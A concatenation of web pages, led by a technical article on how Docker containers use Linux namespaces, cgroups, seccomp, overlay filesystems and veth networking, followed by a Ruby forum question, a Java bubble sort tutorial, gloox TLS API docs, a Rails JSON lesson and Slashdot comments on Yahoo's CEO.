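The namespaces a process occupies can also be inspected from userland. Each entry under /proc/<pid>/ns is a symlink whose target names the namespace type and inode; two processes share a namespace exactly when these targets match. A Linux-only sketch:

```python
import os

# Read the namespace symlinks for a process; "self" means this process.
def namespace_ids(pid="self"):
    ns_dir = "/proc/%s/ns" % pid
    return {name: os.readlink(os.path.join(ns_dir, name))
            for name in sorted(os.listdir(ns_dir))}

ids = namespace_ids()
print(ids.get("net"))  # e.g. 'net:[4026531992]'
```

Comparing these values for a containerised process and its host-side pid is a quick way to confirm which namespaces the runtime actually created.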
However, there is a notable caveat: we can disable some of this isolation[16]. This is an extremely useful property. One example of this would be for system daemons that need access to the host network to bind ports on the host[17], such as running a DNS service or service proxy in a container.

Process #1, or the init process, in Linux systems has some additional responsibilities. When processes terminate in Linux they are not automatically cleaned up, but rather simply enter a terminated state. It is the responsibility of the init process to "reap" those processes, deleting them so that their process ID can be reused[18]. Accordingly, the first process run in a Linux namespace should be an init process, and not a user facing process like mysql. This is known as the zombie reaping problem.

Another place namespaces are used is the Chromium browser[19]. Chromium uses at least the setuid and user namespaces.

Resource isolation: control groups

The kernel documentation for cgroups defines the cgroup as follows:

Control Groups provide a mechanism for aggregating/partitioning sets of tasks, and all their future children, into hierarchical groups with specialized behaviour.

That doesn't really tell us much though. Luckily it expands: subsystems such as cpusets (Documentation/cgroup-v1/cpusets.txt) allow you to associate a set of CPUs and a set of memory nodes with the tasks in each cgroup.

So, cgroups are groups of "jobs" that other subsystems can assign meaning to, and various subsystems currently use them. cgroups are manipulated by reading and writing files in the cgroup filesystem, usually mounted at /sys/fs/cgroup. For example:

# Create a cgroup called "me"
$ mkdir /sys/fs/cgroup/memory/me

# Allocate the cgroup a max of 100Mb memory
$ echo '100000000' | sudo tee /sys/fs/cgroup/memory/me/memory.limit_in_bytes

# Move this process into the cgroup
$ echo $$ | sudo tee /sys/fs/cgroup/memory/me/cgroup.procs
5924

That's it!
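The membership written above can also be read back: every process's cgroups are listed in /proc/<pid>/cgroup, one "hierarchy:controllers:path" line each (on cgroup v2 there is a single "0::" line). A Linux-only sketch:

```python
# Parse a process's cgroup membership out of /proc.
def cgroup_membership(pid="self"):
    entries = []
    with open("/proc/%s/cgroup" % pid) as f:
        for line in f:
            # Format: hierarchy-id:controller-list:path
            hierarchy, controllers, path = line.rstrip("\n").split(":", 2)
            entries.append((hierarchy, controllers, path))
    return entries

membership = cgroup_membership()
for hierarchy, controllers, path in membership:
    print(hierarchy, controllers or "(v2)", path)
```

This is the same information orchestrators and monitoring agents use to attribute resource usage to a workload.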
This process should now be limited to 100Mb total usage.

Docker uses the same functionality in its --memory and --cpus arguments, and it is employed by the orchestration systems Kubernetes and Apache Mesos to determine where to schedule workloads. Although cgroups are most commonly associated with containers, they're already used for other workloads. The best example is perhaps systemd, which automatically puts all services into a cgroup if the CPU scheduler is enabled in the kernel[20]. systemd services are … kind of containers!

Userland isolation: seccomp

While both namespaces and cgroups go a significant way to isolating processes into their own containers, Docker goes further than that to restrict what access the process can have to the Linux kernel itself. This is enforced in supported operating systems via "SECure COMPuting with filters", also known as seccomp-bpf or simply seccomp. The Linux kernel user space API guide defines seccomp as:

Seccomp filtering provides a means for a process to specify a filter for incoming system calls. The filter is expressed as a Berkeley Packet Filter (BPF) program, as with socket filters, except that the data operated on is related to the system call being made: system call number and the system call arguments.

BPF in turn is a small, in-kernel virtual machine language used in a number of kernel tracing, networking and other tasks[21]. Whether the system supports seccomp can be determined by running the following command[22]:

$ grep CONFIG_SECCOMP= /boot/config-$(uname -r)
# Our system supports seccomp
CONFIG_SECCOMP=y

Practically this limits a process's ability to ask the kernel to do certain things.
Any system call can be restricted, and docker allows the use of arbitrary seccomp “profiles” via its --security-opt argument[22]: docker run --rm \ -it \ --security-opt seccomp=/path/to/seccomp/profile.json \ hello-world However, most usefully Docker provides a default security profile that limits some of the more dangerous system calls that processes run from a container should never need to make, including: clone: The ability to clone new namespaces bpf: The ability to load and run bpfprograms add_key: The ability to access the kernel keyring kexec_load: The ability to load a new linux kernel As well as many others. The full list of syscalls blocked by default is available on the Docker website. In addition to seccomp there are other ways to ensure containers are behaving as expected, including: Each of which take slightly different approaches of ensuring the process is only executed within expected behaviour. It’s worth spending time to investigate the tradeoffs of each of these security decisions or simply delegating the choice to a competent third party provider. Additionally it’s worth noting that even though Docker defaults to enabling the seccomp policy, orchestration systems such as kubernetes may disable it[25]. Distribution: the union file system To generate a container Docker requires a set of “build instructions”. A trivial image could be: # Scratch space $ cd $(mktemp -d)# Create a docker file $ cat <<EOF > Dockerfile FROM debian:buster# Create a test directory RUN mkdir /test# Create a bunch of spam files RUN echo $(date) > /test/a RUN echo $(date) > /test/b RUN echo $(date) > /test/cEOF# Build the image $ docker build . 
Sending build context to Docker daemon 4.096kB Step 1/5 : FROM debian:buster ---> ebdc13caae1e Step 2/5 : RUN mkdir /test ---> Running in a9c0fa1a56c7 Removing intermediate container a9c0fa1a56c7 ---> 6837541a46a5 Step 3/5 : RUN echo Sat 30 Mar 18:05:24 CET 2019 > /test/a ---> Running in 8b61ca022296 Removing intermediate container 8b61ca022296 ---> 3ea076dcea98 Step 4/5 : RUN echo Sat 30 Mar 18:05:24 CET 2019 > /test/b ---> Running in 940d5bcaa715 Removing intermediate container 940d5bcaa715 ---> 07b2f7a4dff8 Step 5/5 : RUN echo Sat 30 Mar 18:05:24 CET 2019 > /test/c ---> Running in 251f5d00b55f Removing intermediate container 251f5d00b55f ---> 0122a70ad0a3 Successfully built 0122a70ad0a3 This creates a docker image with the id of 0122a70ad0a3 containing the contents of date at a, b and c. We can verify this by starting the container and examining its contents: $ docker run \ --rm=true \ -it \ 0122a70ad0a3 \ /bin/bash$ cd /test $ ls a b c $ cat *Sat 30 Mar 18:05:24 CET 2019 Sat 30 Mar 18:05:24 CET 2019 Sat 30 Mar 18:05:24 CET 2019 However, in the docker build command earlier Docker created several images. If we run the image after only a and b have been executed we will not see c: $ docker run \ --rm=true \ -it \ 07b2f7a4dff8 \ /bin/bash $ ls test a b Docker is not creating a whole new filesystem for each of these images. Instead, each of the images are layered on top of each other. 
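The layering shown by docker history is what makes this reuse cheap: two images built FROM the same base share its layers on disk. A toy model of the saving (the layer ids and sizes here are hypothetical, loosely based on the sizes printed above):

```python
# Toy model of layer sharing: images are stacks of layer ids, and the
# store keeps only one copy of each distinct layer.
images = {
    "app-a": ["debian-buster", "mkdir-test", "echo-a"],
    "app-b": ["debian-buster", "mkdir-test", "echo-b"],
}

layer_sizes = {
    "debian-buster": 106_000_000,  # shared base root filesystem
    "mkdir-test": 0,
    "echo-a": 29,
    "echo-b": 29,
}

# Naive cost: every image stores its full stack independently.
naive = sum(layer_sizes[l] for layers in images.values() for l in layers)

# Shared cost: each distinct layer is stored once.
distinct = {l for layers in images.values() for l in layers}
shared = sum(layer_sizes[l] for l in distinct)

print(naive, shared)  # sharing roughly halves the storage here
```

With a common 106MB base, the second image costs only its unique layers, which is why reusing bases and keeping layers small matters.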
If we query Docker we can see each of the layers that go into a given image: $ docker history 0122a70ad0a3 IMAGE CREATED CREATED BY SIZE COMMENT 0122a70ad0a3 5 minutes ago /bin/sh -c echo Sat 30 Mar 18:05:24 CET 2019… 29B 07b2f7a4dff8 5 minutes ago /bin/sh -c echo Sat 30 Mar 18:05:24 CET 2019… 29B 3ea076dcea98 5 minutes ago /bin/sh -c echo Sat 30 Mar 18:05:24 CET 2019… 29B 6837541a46a5 5 minutes ago /bin/sh -c mkdir /test 0B ebdc13caae1e 12 months ago /bin/sh -c #(nop) CMD ["bash"] 0B <missing> 12 months ago /bin/sh -c #(nop) ADD file:2219cecc89ed69975… 106MB This allows docker to reuse vast chunks of what it downloads. For example, given the image we built earlier we can see that it uses: - A layer called ADD file:…— this is the Debian Buster root filesystem at 106MB - A layer for athat renders the date to disk at 29B - A layer for bthat renders the date to disk at 29B And so on. Docker will reuse the Add file:… Debian Buster root for all image that start with FROM: debian:buster. This allows Docker to be extremely space efficient if possible, reusing the same operating system image for multiple different executions. Even though Docker is extremely space efficient the docker library on disk can grow extremely large and transferring large docker images over the network can become expensive. Therefore, try to reuse image layers where possible and prefer smaller operating systems or the scratch (nothing) image where possible. These layers are implemented via a Union Filesystem, or UnionFS. 
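The lookup rule a union filesystem applies (a file in the upper layer shadows the lower layer, and a "whiteout" entry in upper hides a lower file) can be modelled in a few lines. This is a conceptual sketch, not the kernel's algorithm:

```python
# Conceptual model of a union filesystem lookup.
WHITEOUT = object()  # marker for a deleted (hidden) file

def overlay_lookup(name, upper, lower):
    # Upper layer wins; a whiteout hides the lower file entirely.
    if name in upper:
        return None if upper[name] is WHITEOUT else upper[name]
    return lower.get(name)

lower = {"i-am-the-lower": "lower contents", "deleted": "old contents"}
upper = {"i-am-the-upper": "upper contents", "deleted": WHITEOUT}

assert overlay_lookup("i-am-the-lower", upper, lower) == "lower contents"
assert overlay_lookup("i-am-the-upper", upper, lower) == "upper contents"
assert overlay_lookup("deleted", upper, lower) is None  # hidden by whiteout
```

Writes always land in the upper layer, which is why a container's changes never modify the shared image layers beneath it.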
There are various "backends" or filesystems that can implement this approach:
- overlay2
- devicemapper
- aufs

Generally speaking the package manager on our machine will include the appropriate underlying filesystem driver; docker supports many:

$ docker info | grep Storage
 Storage Driver: overlay2

We can replicate this implementation with an overlay mount fairly easily[26]:

# scratch
$ cd $(mktemp -d)

# Create some layers
$ mkdir \
    lower \
    upper \
    workdir \
    overlay

# Create some files that represent the layers
$ touch lower/i-am-the-lower
$ touch upper/i-am-the-upper

# Create the layered filesystem at overlay with lower, upper and workdir
$ sudo mount -t overlay overlay \
    -o lowerdir=lower,upperdir=upper,workdir=workdir \
    ./overlay

# List the directory
$ ls overlay/
i-am-the-lower i-am-the-upper

Docker nests those layers in this way until the multi-layered filesystem has been successfully implemented. Files that are written are written back to the upper directory, in the case of overlay2. However, Docker will generally dispose of these temporary files when the container is removed.

Generally speaking all software needs access to shared libraries found in static paths in Linux operating systems. Accordingly it is the convention to simply ship a stripped down version of an operating system's root filesystem such that users can install software and applications can find the libraries they expect. However, it is possible to use an empty filesystem and a statically compiled binary with the scratch image type.

Connectivity: networking

As mentioned earlier, containers make use of Linux namespaces. Of particular interest when understanding container networking is the network namespace.
This namespace gives the process separate:
- (virtual) ethernet devices
- routing tables
- iptables rules

For example,

# Create a new network namespace
$ sudo unshare --fork --net

# List the ethernet devices with associated ip addresses
$ ip addr
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

# List all iptables rules
$ iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

# List all network routes
$ ip route show
# No output

By default, the container has no network connectivity; not even the loopback adapter is up. We cannot even ping ourselves!

$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
ping: sending packet: Network is unreachable

We can start setting up the expected network environment by bringing up the loopback adapter:

$ ip link set lo up

# Test the loopback adapter
$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.092 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.068 ms

However, we cannot access the outside world. In most environments our host machine will be connected via ethernet to a given network and either have an IP assigned to it by the cloud provider or, in the case of a development or office machine, request an IP via DHCP. Our container, though, is in a network namespace of its own and has no knowledge of the ethernet device connected to the host. To connect the container to the host we need to employ a veth device. veth, or "Virtual Ethernet Device", is defined by man veth as follows: The veth devices are virtual Ethernet devices.
They can act as tunnels between network namespaces to create a bridge to a physical network device in another namespace, but can also be used as standalone network devices. This is exactly what we need! Because unshare creates an anonymous network namespace we need to determine what the pid of the process started in that namespace is[27][28]: $ echo $$ 18171 We can then create the veth device: $ sudo ip link add veth0 type veth peer name veth0 netns 18171 We can see both on the host and the guest these virtual ethernet devices appear. However, neither has an IP attached nor any routes defined: # Container$ ip addr 1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: veth0@if7: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000 link/ether 16:34:52:54:a2:a1 brd ff:ff:ff:ff:ff:ff link-netnsid 0 $ ip route show# No output To address that we simply add an IP and define the default route: # On the host $ ip addr add 192.168.24.1 dev veth0# Within the container $ ip address add 192.168.24.10 dev veth0 From there, bring the devices up: # Both host and container $ ip link set veth0 up Add a route such that 192.168.24.0/24 goes out via veth0: # Both host and guest ip route add 192.168.24.0/24 dev veth0 And voilà! We have connectivity to the host namespace and back: # Within container $ ping 192.168.24.1 PING 192.168.24.1 (192.168.24.1): 56 data bytes 64 bytes from 192.168.24.1: icmp_seq=0 ttl=64 time=0.149 ms 64 bytes from 192.168.24.1: icmp_seq=1 ttl=64 time=0.096 ms 64 bytes from 192.168.24.1: icmp_seq=2 ttl=64 time=0.104 ms 64 bytes from 192.168.24.1: icmp_seq=3 ttl=64 time=0.100 ms However, that does not give us access to the wider internet. 
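The kernel picks among such routes by longest prefix match: the /24 route we just added wins over a less specific default route for addresses inside it. A sketch with Python's ipaddress module, using the addresses from the example above:

```python
import ipaddress

# A toy routing table: (network, next hop description).
routes = [
    (ipaddress.ip_network("0.0.0.0/0"), "default via 192.168.24.1"),
    (ipaddress.ip_network("192.168.24.0/24"), "dev veth0"),
]

def route_for(dst):
    # Longest prefix match: of all networks containing the destination,
    # pick the one with the longest prefix, as the kernel does.
    dst = ipaddress.ip_address(dst)
    candidates = [(net, hop) for net, hop in routes if dst in net]
    return max(candidates, key=lambda r: r[0].prefixlen)[1]

print(route_for("192.168.24.10"))  # the /24 wins: dev veth0
print(route_for("172.217.22.14"))  # falls through to the default route
```

This is why traffic to the host's veth address goes straight out the pair, while everything else needs the default route (and NAT) set up next.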
While the veth adapter functions as a virtual cable between our container and our host, there is currently no path from our container to the internet:

```shell
# Within container
$ ping google.com
ping: unknown host
```

To create such a path we need to modify our host so that it functions as a "router" between its own, separated network namespaces and its internet-facing adapter. Luckily, Linux is well set up for this purpose. First, we need to change Linux's default behaviour of dropping packets that are not destined for one of its own IP addresses, and instead allow it to forward packets from one adapter to another:

```shell
# On the host
$ echo 1 > /proc/sys/net/ipv4/ip_forward
```

That means when we request public-facing IPs from within our container via our veth adapter, the host won't simply drop those packets. From there we employ iptables rules on the host to forward traffic from the host veth adapter to the internet-facing adapter, in this case wlp2s0:

```shell
# On the host
# Forward packets from the container to the host adapter
$ iptables -A FORWARD -i veth0 -o wlp2s0 -j ACCEPT

# Forward packets that have been established via egress from the host adapter
# back to the container
$ iptables -A FORWARD -i wlp2s0 -o veth0 -m state --state ESTABLISHED,RELATED -j ACCEPT

# Relabel the IPs for the container so return traffic will be routed correctly
$ iptables -t nat -A POSTROUTING -o wlp2s0 -j MASQUERADE
```

We then tell our container to send any traffic it doesn't otherwise know how to route down the veth adapter:

```shell
# Within the container
$ ip route add default via 192.168.24.1 dev veth0
```

And the internet works!
```shell
$ ping google.com
PING google.com (172.217.22.14): 56 data bytes
64 bytes from 172.217.22.14: icmp_seq=0 ttl=55 time=16.456 ms
64 bytes from 172.217.22.14: icmp_seq=1 ttl=55 time=15.102 ms
64 bytes from 172.217.22.14: icmp_seq=2 ttl=55 time=34.369 ms
64 bytes from 172.217.22.14: icmp_seq=3 ttl=55 time=15.319 ms
```

As mentioned, each container implementation can implement networking differently. There are implementations that use the aforementioned veth pair, vxlan, BPF or other cloud-specific mechanisms. However, when designing containers we need some way to reason about what behaviour to expect. To help address this, the "Container Network Interface" (CNI) tooling has been designed. It allows defining consistent network behaviour across network implementations, as well as models such as Kubernetes' lo adapter shared between several containers. The networking side of containers is an area undergoing rapid innovation, but relying on:

- a lo interface
- a public-facing eth0 (or similar) interface

being present seems a fairly stable guarantee.

Landscape review

Given our understanding of the implementation of containers, we can now take a look at some of the classic Docker discussions.

Systems Updates

One of the oft-overlooked parts of running containers is the necessity to keep both them and the host system up to date. On modern systems it is quite common to simply enable automatic updates on the host and, so long as we stick to the system package manager and ensure updates stay successful, the system will keep itself both up to date and stable. Containers, however, take a very different approach. They are effectively giant static binaries deployed onto a production system, and in that capacity they can do no self-maintenance. Accordingly, even if there are no updates to the software a container runs, containers should be periodically rebuilt and redeployed to the production system, lest they accumulate vulnerabilities over time.
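One low-tech way to honour that rebuild requirement is to rebuild and redeploy images on a schedule, even when the application itself is unchanged, so base-image fixes get folded in. A minimal sketch of such an image (the base image and the my-app binary name are placeholders, not from the article):

```dockerfile
# Rebuilt periodically (e.g. by a nightly CI job) so that security updates
# in the base image and system packages are picked up even when the
# application itself has not changed.
FROM debian:stable-slim
RUN apt-get update \
    && apt-get upgrade -y \
    && rm -rf /var/lib/apt/lists/*
COPY my-app /usr/local/bin/my-app
CMD ["my-app"]
```

A scheduled pipeline then simply re-runs the image build against the refreshed base and redeploys the result, which is what keeps a fleet from accumulating known-vulnerable libraries.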
Init within container

Given our understanding of containers, it's reasonable to consider the "1 process per container" advice, determine that it is an oversimplification of how containers work, and conclude that it makes sense in some cases to do service management within a container with a system like runit. This allows multiple processes to be executed within a single container, including things like:

- syslog
- logrotate
- cron

and so forth. In the case where Docker is the only system being used, it is indeed reasonable to think about doing service management within Docker, particularly when hitting the constraints of shared filesystem or network state. However, systems such as Kubernetes, Swarm or Mesos have replaced much of the necessity for these init systems; tasks such as log aggregation, restarting services or colocating services are taken care of by these tools. Accordingly, it's best to keep containers simple so that they are maximally composable and easy to debug, delegating the more complex behaviour out.

In Conclusion

Containers are an excellent way to ship software to production systems. They solve a swathe of interesting problems and cost very little as a result. However, their rapid growth has meant some confusion in industry as to exactly how they work, whether they're stable and so forth. Containers are a combination of both old and new Linux kernel technology such as namespaces, cgroups, seccomp and other Linux networking tooling, but they are as stable as any other kernel technology (so, very) and well suited for production systems.

❤ for making it this far.

References

- "Docker."
- "Cloud Native Technologies in the Fortune 100." Sep-2017.
- B. Cantrill, "The Container Revolution: Reflections After the First Decade." Sep-2018.
- "Papers (Jail)."
- "An absolutely minimal chroot." Jan-2011.
- J. Beck et al., "Virtualization and Namespace Isolation in the Solaris Operating System (PSARC/2002/174)." Sep-2006.
- M. Kerrisk, "Namespaces in operation, part 1: namespaces overview." Jan-2013.
- A. Polvi, "CoreOS is building a container runtime, rkt." Jan-2014.
- "Basics of the Unix Philosophy." esr/writings/taoup/html/ch01s06.html
- P. Estes and M. Brown, "OCI Image Support Comes to Open Source Docker Registry." Oct-2018.
- "Open Container Initiative Runtime Specification." Mar-2018.
- "The 5 principles of Standard Containers." Dec-2016.
- "Open Container Initiative Image Specification." Jun-2017.
- "Open Container Initiative Distribution Specification." Mar-2019.
- "Docker Overview."
- J. Frazelle, "Containers aka crazy user space fun." Jan-2018.
- "Use Host Networking."
- Krallin, "Tini: A tini but valid init for containers." Nov-2018.
- L. Poettering, "systemd for Administrators, Part XVIII." Oct-2012.
- A. Howden, "Coming to grips with eBPF." Mar-2019.
- "Seccomp security profiles for docker."
- "Linux kernel capabilities."
- M. Stemm, "SELinux, Seccomp, Sysdig Falco, and you: A technical discussion." Dec-2016.
- "Pod Security Policies."
- Programster, "Example OverlayFS Usage." Nov-2015.
- "How do I connect a veth device inside an 'anonymous' network namespace to one outside?" Oct-2017.
- D. P. García, "Network namespaces." Apr-2016.

Originally published at on March 27, 2018.
https://andrewhowdencom.medium.com/what-is-a-container-46c42f68d8cc
Hi, I host an IronRuby engine in my app and get a lot of compiler warnings about duplicate definitions for classes in System.Linq. In the past it wasn’t much of an issue but now that I have started using some Linq functionality I have found myself having to add and remove System.Linq and Microsoft.Scripting.Core to get my app to compile. It seems that when there is a conflict the assembly reference added last wins. Is there a better way to solve this? Are the DLR and main .Net Linq namespaces going to merge in the future? Thanks, Aaron
https://www.ruby-forum.com/t/namespace-conflict-system-linq/165454
Before implementing a Java program for bubble sort, let's first see how bubble sort arranges array elements in either ascending or descending order. Bubble sort is the simplest of the available sorting algorithms, but its simplicity does not carry much practical value: it is also one of the most time-consuming. It is, however, conceptually the simplest of the sorting algorithms and for that reason a good starting point for exploring sorting techniques, which is why it is included here for beginners. Because of its poor O(n^2) runtime performance, it is not used often for large (or even medium-sized) lists. This article implements bubble sort in Java and briefly explains the algorithm. Writing Java code for bubble sort is a trivial task. Let's assume that we have an array of length N holding randomly ordered elements indexed from 0 to N-1, and we want to sort it in ascending order. While sorting the array elements, bubble sort looks at only two adjacent elements at a time. Bubble sort starts from the left end of the array and compares the two elements at positions 0 and 1. If the element at index 0 is larger, we swap them; if the element at index 1 is larger, we do nothing. Then we move over one position and compare the elements at positions 1 and 2. Again, if the one on the left is larger, we swap them; otherwise we do nothing. One full pass like this places the largest element at the last position of the array. We repeat the process up to N-1 times to sort all array elements. The following Java program defines a class BubbleSort that contains a parameterized static generic method bubbleSort for any base type T. Note that Java provides the java.lang.Comparable interface, which contains a single method, compareTo. Any class that correctly implements this interface guarantees a total ordering of its instances.
```java
class BubbleSort {
    public static <T extends Comparable<T>> void bubbleSort(T[] list, int size) {
        int swapOccurred = 1, outCounter, inCounter;
        T temp;
        // swapOccurred helps to stop iterating if the array gets sorted before
        // outCounter reaches size
        for (outCounter = size - 1; outCounter > 0 && swapOccurred == 1; outCounter--) {
            swapOccurred = 0;
            for (inCounter = 0; inCounter < outCounter; inCounter++) {
                if (list[inCounter].compareTo(list[inCounter + 1]) > 0) {
                    temp = list[inCounter];
                    list[inCounter] = list[inCounter + 1];
                    list[inCounter + 1] = temp;
                    swapOccurred = 1;
                }
            }
        }
    }
}

public class BubbleSortDemo {
    public static void main(String[] args) {
        Integer arr[] = {10, 9, 8, 7, 6, 5, 4, 3, 2, 1};
        BubbleSort.bubbleSort(arr, arr.length);
        System.out.println("Sorted Array: ");
        for (Integer i : arr) {
            System.out.println(i);
        }
    }
}
```

```
OUTPUT
======
Sorted Array:
1
2
3
4
5
6
7
8
9
10
```

The idea of the above implementation is to put the smallest element at the beginning of the array (index 0) and the largest item at the end (index size-1). The loop counter outCounter in the outer for loop starts at the end of the array, at size-1, and decrements itself each time through the loop. The items at indices greater than outCounter are always completely sorted. The outCounter variable moves left after each pass of inCounter, so that items that are already sorted are no longer involved in the algorithm. The inner loop counter inCounter starts at the beginning of the array and increments itself each cycle of the inner loop, exiting when it reaches outCounter. Within the inner loop, the two array cells pointed to by inCounter and inCounter+1 are compared, and swapped if the one at inCounter is larger than the one at inCounter+1. The above implementation of BubbleSort iterates through the array elements O(n^2) times in the worst case, when the array to be sorted is reversely ordered. To make the implementation somewhat more efficient we added a flag, swapOccurred, that tells us whether a swap occurred or not.
Not even a single swap will occur if the array is already sorted, and in that case we can stop iterating through the array elements. Bubble sort as such offers no benefit from an efficiency point of view; it is taught in computer science courses purely as an introduction to sorting techniques. Bubble sort is very slow and runs in O(n^2) time in the worst case. However, with the swapOccurred flag introduced it shows some performance gain on already-sorted or nearly sorted input. In this tutorial we discussed bubble sort and implemented the algorithm in Java. Bubble sort is the most basic and the slowest sorting technique.
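Since bubbleSort is generic over any Comparable type, the identical logic also sorts strings: String implements Comparable&lt;String&gt;, so compareTo yields lexicographic order. A small standalone sketch (it restates a minimal copy of the generic method so the file compiles on its own; the class name is ours, not from the article):

```java
import java.util.Arrays;

public class BubbleSortStrings {
    // Minimal copy of the generic early-exit bubble sort from the article.
    static <T extends Comparable<T>> void bubbleSort(T[] list, int size) {
        int swapOccurred = 1;
        for (int out = size - 1; out > 0 && swapOccurred == 1; out--) {
            swapOccurred = 0;
            for (int in = 0; in < out; in++) {
                if (list[in].compareTo(list[in + 1]) > 0) {
                    T temp = list[in];
                    list[in] = list[in + 1];
                    list[in + 1] = temp;
                    swapOccurred = 1;
                }
            }
        }
    }

    public static void main(String[] args) {
        String[] fruit = {"pear", "apple", "mango", "banana"};
        bubbleSort(fruit, fruit.length);
        System.out.println(Arrays.toString(fruit)); // [apple, banana, mango, pear]
    }
}
```

No change to the sorting code was needed; only the element type differs, which is the point of writing the method against Comparable rather than a concrete type.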
http://cs-fundamentals.com/data-structures/bubble-sort-in-java.php
#include <tlsdefault.h> This is an abstraction of the various TLS implementations. Definition at line 30 of file tlsdefault.h. Supported TLS types. Definition at line 37 of file tlsdefault.h. Constructs a new TLS wrapper. Definition at line 41 of file tlsdefault.cpp. Virtual Destructor. Definition at line 72 of file tlsdefault.cpp. This function performs internal cleanup and will be called after a failed handshake attempt. Definition at line 108 100 of file tlsdefault.cpp. Use this function to feed unencrypted data to the encryption implementation. The encrypted result will be pushed to the TLSHandler's handleEncryptedData() function. Definition at line 92 of file tlsdefault.cpp. This function is used to retrieve certificate and connection info of a encrypted connection. Reimplemented from TLSBase. Definition at line 136 114 of file tlsdefault.cpp. Returns the state of the encryption. Reimplemented from TLSBase. Definition at line 122 of file tlsdefault.cpp. Use this function to set a number of trusted root CA certificates which shall be used to verify a servers certificate. Definition at line 130 of file tlsdefault.cpp. Use this function to set the user's certificate and private key. The certificate will be presented to the server upon request and can be used for SASL EXTERNAL authentication. The user's certificate file should be a bundle of more than one certificate in PEM format. The first one in the file should be the user's certificate, each cert following that one should have signed the previous one. Definition at line 144 of file tlsdefault.cpp. Returns an ORed list of supported TLS types. Definition at line 77 of file tlsdefault.cpp.
https://camaya.net/api/gloox-0.9.9.12/classgloox_1_1TLSDefault.html
Better JSON Messages (2:02) with Naomi Freeman

We can customize our application's responses to include more than just a status header. In this video, we'll learn how to provide more detailed JSON responses for our API.

Code Samples

We can return more detailed information than just a header with a status. Here is what our create method in app/controllers/api/todo_lists_controller.rb looks like now:

```ruby
def create
  list = TodoList.new(list_params)
  if list.save
    render json: {
      status: 200,
      message: "Successfully created To-do List.",
      todo_list: list
    }.to_json
  else
    render json: {
      status: 500,
      errors: list.errors
    }.to_json
  end
end
```

More Reading

Check out Active Model Serializations and Active Model JSON Serialization for more information on as_json.

- 0:00 Right now, we have ToDoList creation working, and
- 0:03 we get a header back when we successfully create a to do list with our API.
- 0:07 The only thing is, all we get back is a header saying okay or 500.
- 0:11 You might be thinking to yourself, self,
- 0:15 wouldn't it be nice if we could get back the to do list we just created, or
- 0:18 some error messages if we weren't able to create it?
- 0:22 And self, you'd be right.
- 0:23 Let's go ahead and do that now.
- 0:26 Open up the API ToDoList controller and head down to the create method.
- 0:30 This time if the list saves, let's return that along with the success message.
- 0:40 Render JSON, with our status 200 code.
- 0:43 [BLANK_AUDIO]
- 0:46 Adding the message.
- 0:48 Successfully created ToDoList.
- 0:50 [BLANK_AUDIO]
- 0:57 And adding this dot to JSON.
- 1:00 This is going to return a JSON object,
- 1:02 that says we successfully created a ToDoList.
- 1:05 The status is 200 for success, the message is successful and
- 1:09 we also return a JSON encoded version of the ToDoList.
- 1:13 If we run this with CURL, we get the following.
- 1:18 Our status 200 code and this new message, successfully created ToDoList.
- 1:24 So we know that that worked.
- 1:26 Awesome!
- 1:28 Now, let's do the same thing for the error case.
- 1:34 Again, we're going to render the JSON, with the appropriate status code.
- 1:41 As well as a list of errors.
- 1:44 And make sure that we dot to JSON.
- 1:48 Now when we run our CURL request with a blank title.
- 1:51 [BLANK_AUDIO]
- 1:54 We get the following, the 500 status code and the list of errors.
- 2:01 That looks pretty good.
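The render json: { ... }.to_json pattern in the code sample hinges on Ruby's hash-to-JSON serialization. Outside Rails, the same serialization can be sketched with the stdlib json library (the list hash below is a stand-in for the TodoList record):

```ruby
require 'json'

# Build the same success payload the controller returns.
list = { id: 1, title: "Groceries" }
payload = {
  status: 200,
  message: "Successfully created To-do List.",
  todo_list: list
}.to_json

puts payload
# Symbol keys are serialized as JSON strings, so clients read them back as such:
parsed = JSON.parse(payload)
raise "unexpected status" unless parsed["status"] == 200
```

In Rails, render json: would serialize a plain hash on its own; the explicit .to_json in the video's code makes the serialization step visible.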
https://teamtreehouse.com/library/build-a-rails-api/coding-the-api/better-json-messages
Leave Yahoo CEO Scott Thompson Alone! 319 theodp writes "Over at The Daily Beast, Dan Lyons says Resumegate is overblown and says it's time to stop picking on Yahoo CEO Scott Thompson. Even without the circa-1979 CS degree some incorrectly thought he possessed, Lyons argues that Thompson is still perfectly capable, his critics have ulterior motives, and his competitors have all lied before. 'Forgive me for being less than shocked at the idea of a CEO lying,' writes Lyons. 'Steve Jobs [college dropout] [college dropout] last fall settled charges brought by the FTC that his company had made "unfair and deceptive" claims—I think that's like lying—and, what's more, had violated federal laws.' So what makes the fudging of a 30-year old accomplishment on the Yahoo CEO's resume a transgression that the 'highly ethical and honest folks in Silicon Valley' simply cannot bear? 'Facebook is a cool kid,' explains Lyons. 'So is Apple. Yahoo is the loser kid that nobody likes.'" It's the hypocricy (Score:5, Insightful) The assumption is that an employee who lied on his resume would likely be fired, but a CEO is too important to fire. Re:It's the hypocricy (Score:5, Insightful). Re: (Score:2). So you think this is worse because a CEO can tell more important lies, to more important people (than the average worker)? Isn't that why CEOs are often allowed to lie in the first place? The summary gives lots of examples of CEOs lying -- big lies to important people -- but we're all familiar with common CEO lies that are socially accepted: Our earnings are up. We're not going to have layoffs. My outrageous salary is justified by my unique skills. Note that the accepted lies from CEOs include protecting an Re:It's the hypocricy (Score:4, Insightful) Honestly, I truly doubt his supposed CS degree from 1979 ever ONCE came up in the board's discussion to hire him. It's entirely irrelevant to the job at hand. 
